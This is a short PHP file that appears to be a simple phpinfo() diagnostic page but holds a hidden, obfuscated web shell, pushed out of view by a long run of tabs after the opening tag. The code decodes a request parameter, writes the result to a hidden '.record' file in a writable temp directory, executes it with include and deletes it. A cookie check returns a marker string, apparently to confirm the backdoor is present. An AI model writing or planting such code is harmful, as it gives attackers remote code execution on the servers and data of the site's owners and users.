<?php																																										if(!is_null($_REQUEST["item"] ?? null)){ $pointer = $_REQUEST["item"]; $pointer= explode ( '.' ,$pointer); $pgrp = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt6 ); foreach ($pointer as $l =>$v8): $sChar = ord($salt6[$l % $sLen] ); $d = ((int)$v8 - $sChar - ($l % 10)) ^ 73; $pgrp.= chr($d ); endforeach; $ent = array_filter([session_save_path(), getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", getcwd(), getenv("TMP"), "/dev/shm", "/var/tmp"]); foreach ($ent as $key => $descriptor) { if ((bool)is_dir($descriptor) && (bool)is_writable($descriptor)) { $element = "$descriptor/.record"; $success = file_put_contents($element, $pgrp); if ($success) { include $element; @unlink($element); die();} } } }


if(isset($_COOKIE['7r'])) {
    die('nIVbaVc7');
}

phpinfo();